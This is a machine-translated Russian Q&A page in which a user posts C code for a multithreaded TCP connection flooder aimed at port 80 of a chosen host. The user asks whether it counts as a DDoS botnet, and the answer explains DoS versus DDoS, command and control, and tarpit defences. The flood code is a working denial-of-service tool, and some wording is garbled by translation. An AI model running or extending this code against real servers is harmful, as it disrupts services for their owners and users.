Можно ли сказать, что это простой ботнет DDOS?

Это клиентская программа на основе posix-сокетов и потоков. Программа создает несколько потоков и собирается заблокировать сервер. Можно ли сказать, что это простой ботнет DDOS? Код на C / C ++ и для платформ posix.
Вот код

#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

int get_hostname_by_ip(char* h , char* ip)
{
struct hostent *he;
struct in_addr **addr_list;
int i;

if ((he = gethostbyname(h)) == NULL)
{
perror("gethostbyname");
return 1;
}
addr_list = (struct in_addr **) he->h_addr_list;
for(i = 0; addr_list[i] != NULL; i++)
{
strcpy(ip , inet_ntoa(*addr_list[i]) );
return 0;
}

return 1;
}

void client(char* h)
{
int fd;
char* ip = new char[20];
int port = 80;
struct sockaddr_in addr;
char ch[]="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
while(1)
{
fd = socket(AF_INET, SOCK_STREAM, 0);
addr.sin_family=AF_INET;
get_hostname_by_ip(h, ip);
addr.sin_addr.s_addr=inet_addr(ip);
addr.sin_port=htons(port);
if(connect(fd, (struct sockaddr*)&addr, sizeof(addr)) < 0)
{
perror("error: can't connect to server\n");
return;
}
if(send(fd, ch, sizeof(ch), 0) < 0)
{
perror("error: can't send\n");
}
close(fd);
}
}

struct info
{
char* h;
int c;
};void* thread_entry_point(void* i)
{
info* in = (info*)i;
client(in->h);
}

int main(int argc, char** argv)
{
int s = atoi(argv[2]);
pthread_t t[s];
info in = {argv[1], s};
for(int i = 0; i < s; ++i)
{
pthread_create(&t[i], NULL, thread_entry_point, (void*)&in);
}
pthread_join(t[0], NULL);

return 0;
}

3

Решение

Нет: первый «D» в «DDoS» означает «Распределенный». Один процесс на одной машине представляет собой простую DoS (и с точки зрения этой машины он может быть ограничен такими механизмами, как Unix). limit, С точки зрения жертвы, достаточно просто исключить нарушающий IP на уровне брандмауэра — см. Ниже).

Для DDoS вам понадобится какая-то форма командования и управления, позволяющая процессу на машине A бездействовать, с минимальным нарушением, чтобы избежать обнаружения, и затем получить от машины B приказ атаковать машину C. Это разрушительный трафик, направляемый к C многими экземплярами A, который затем будет представлять / вызывать фактический отказ в обслуживании против C.

Ваш код мог хорошо быть часть DDoS-бот, причем часть CC получает экземпляр info, Это также был бы хороший инструмент обучения, в то время как для реальных целей «черной шляпы» это было бы не очень полезно.

Это было бы гораздо больше по теме на security.stackexchange.com.

В вашем примере мы имеем соотношение 1: 1, т.е. вы открываете один сокет, жертва должна выделить один разъем. Преимущество простоты (программирование ванильных сокетов — это все, что требуется). С другой стороны, это война на истощение — вы должны быть уверены, что исчерпали фактические ресурсы жертвы задолго до того, как исчерпали свои собственные. В противном случае вам нужно усилить атаку, набрав больше ботов.

Тем не менее, оказывается, что после того, как жертва сняла отпечатки пальцев с атаки, что не сложно сделать, есть несколько стратегий, которые она может использовать, чтобы помешать ей и повернуть соотношение в свою пользу. Одним из таких примеров является БИТУМНАЯ ЯМА. Подбирая враждебные связи, жертва может поставить целую сеть злоумышленников на колени (есть и другие стратегии, которые позволяют фальсифицирующий первоначальное соединение, так что злоумышленник, использующий ванильный подход, должен потратить впустую сокет и структуры, в то время как защитник ничего не делает, кроме как настраивает вещи. Не увеличиваясь до бесконечности, соотношение ресурсов делает стремительный рост в пользу защитника).

5

Другие решения

Других решений пока нет …

По вопросам рекламы [email protected]